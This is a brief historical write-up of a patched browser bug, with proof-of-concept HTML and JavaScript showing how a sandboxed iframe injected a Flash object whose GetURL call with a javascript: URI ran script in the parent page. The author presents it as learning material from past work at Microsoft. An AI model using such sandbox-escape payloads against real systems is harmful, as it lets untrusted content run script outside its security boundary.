After loading, a sandboxed iframe with only allow-scripts could inject a Flash object that used the ActionScript GetURL method to execute JavaScript in the parent window. The Flash call was attributed to the parent’s context, completely bypassing the sandbox.

<!-- parent page -->
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>
<!-- sandboxed.html -->
<script>
window.onload = function()
{
    var strSwf = '<object codebase="http://fpdownload.macromedia.com/...">' +
                 '<param name="movie" value="geturl.swf?TARGET=_parent&REDIR=javascript:alert(document.body.innerText);" />' +
                 '</object>';
    document.body.insertAdjacentHTML('beforeEnd', strSwf);
}
</script>

The Flash movie called GetURL with _parent as the target window and a javascript: URI as the URL. The browser executed the script in the parent frame’s context without any sandbox restriction. The insertion had to happen after the page loaded to avoid the Flash being blocked during the initial parse.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.